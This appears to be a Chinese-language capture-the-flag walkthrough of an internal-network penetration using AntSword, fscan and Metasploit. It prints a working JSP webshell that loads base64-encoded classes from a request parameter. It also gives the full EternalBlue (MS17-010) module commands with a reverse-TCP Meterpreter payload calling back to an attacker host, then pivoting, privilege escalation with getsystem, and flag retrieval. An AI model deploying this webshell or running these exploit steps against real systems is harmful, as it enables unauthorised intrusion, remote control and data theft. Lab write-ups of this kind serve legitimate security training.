本文使用工具fscan,msf,抓包工具,蚁剑
登录后台,账号是admin,密码是admin123456
使用漏洞
蚁剑连接
上线msf
上传fscan
扫描发现有三个存活,20有8080端口开放
创建木马
<%! classU extends ClassLoader { U(ClassLoader c){super(c);} public Class g(byte[] b){returnsuper.defineClass(b,0, b.length);}} public byte[] base64Decode(String str) throws Exception {try{ Class clazz= Class.forName("sun.misc.BASE64Decoder");return(byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(),str);} catch (Exception e){ Class clazz= Class.forName("java.util.Base64"); Object decoder = clazz.getMethod("getDecoder").invoke(null);return(byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder,str);}}%><% String cls = request.getParameter("passwd");if(cls != null){ new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}%>
蚁剑连接
上传刚才的木马并运行
提权
上传fscan并扫描
设置路由,此时你会有两个会话和路由
直接在msf内攻击内网
使用永恒之蓝漏洞
在 MSF 中调用永恒之蓝(EternalBlue)漏洞模块对内网主机发起攻击,核心命令如下:
use exploit/windows/smb/ms17_010_eternalblue # 选择永恒之蓝漏洞利用模块,该模块针对 Windows SMB 远程代码执行漏洞(MS17-010) set RHOSTS 192.168.1.20 设置目标主机 IP 地址,即内网扫描中发现的开放 8080 端口的主机 set LHOST 192.168.1.10 设置回连监听地址,即攻击机(MSF 所在主机)的 IP,用于接收反弹会话 set LPORT 4444 设置回连监听端口,默认 4444,确保与攻击机防火墙放行规则一致 set PAYLOAD windows/x64/meterpreter/reverse_tcp 指定攻击成功后返回的 Payload 类型,reverse_tcp 表示目标主动回连攻击机,可有效穿透 NAT exploit 执行攻击,若成功将获得目标主机的 Meterpreter 会话攻击成功后,MSF 会返回一个 Meterpreter 会话,此时可进行以下会话管理与后续操作:
- 查看会话:输入
sessions -l列出当前所有会话,确认刚获得的会话 ID。 - 切换会话:输入
sessions -i 会话ID进入指定会话,例如sessions -i 1。 - 后台运行:输入
background将当前会话转入后台,便于继续执行其他攻击或扫描任务。 - 系统信息收集:在会话内执行
sysinfo查看目标系统版本与架构,getuid查看当前权限。 - 权限提升:执行
getsystem尝试提升至 SYSTEM 权限,便于后续读取敏感文件。 - 获取 Flag:使用
shell进入目标系统命令行,通过dir或find命令定位并读取最后一个 flag 文件。
获取最后一个flag